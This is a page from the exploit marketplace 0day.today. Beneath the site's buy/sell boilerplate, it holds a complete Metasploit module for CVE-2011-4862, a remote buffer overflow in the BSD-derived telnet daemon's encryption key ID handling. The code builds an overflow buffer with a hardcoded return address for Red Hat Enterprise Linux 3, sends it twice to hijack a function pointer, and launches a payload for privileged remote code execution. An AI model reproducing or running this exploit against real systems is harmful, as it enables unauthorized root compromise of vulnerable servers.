0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
[##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Telnet
include Msf::Exploit::BruteTargets
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the encryption option handler of the
Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of
Linux systems running telnetd.
},
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2011-4862'],
['OSVDB', '78020'],
['BID', '51182'],
['URL', 'http://www.exploit-db.com/exploits/18280/']
],
'Privileged' => true,
'Platform' => 'linux',
'Payload' =>
{
'Space' => 200,
'BadChars' => "\x00",
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 23 2011'))
end
def exploit_target(t)
connect
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status(banner_sanitized) if datastore['VERBOSE']
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"
enc_keyid = "\xff\xfa\x26\x07"
end_suboption = "\xff\xf0"
penc = payload.encoded.gsub("\xff", "\xff\xff")
key_id = Rex::Text.rand_text_alphanumeric(400)
key_id[ 0, 2] = "\xeb\x76"
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")
key_id[76, 4] = [ t['Ret'] ].pack("V")
# Some of these bytes can get mangled, jump over them
key_id[80,40] = "\x41" * 40
# Insert the real payload
key_id[120, penc.length] = penc
# Create the Key ID command
sploit = enc_keyid + key_id + end_suboption
# Initiate encryption
sock.put(enc_init)
# Wait for a successful response
loop do
data = sock.get_once(-1, 5) rescue nil
if not data
raise RuntimeError, "This system does not support encryption"
end
break if data.index("\xff\xfa\x26\x02\x01")
end
# The first request smashes the pointer
print_status("Sending first payload")
sock.put(sploit)
# Make sure the server replied to the first request
data = sock.get_once(-1, 5)
unless data
print_status("Server did not respond to first payload")
return
end
# Some delay between each request seems necessary in some cases
::IO.select(nil, nil, nil, 0.5)
# The second request results in the pointer being called
print_status("Sending second payload...")
sock.put(sploit)
handler
::IO.select(nil, nil, nil, 0.5)
disconnect
end
end
# 0day.today [2024-11-16] #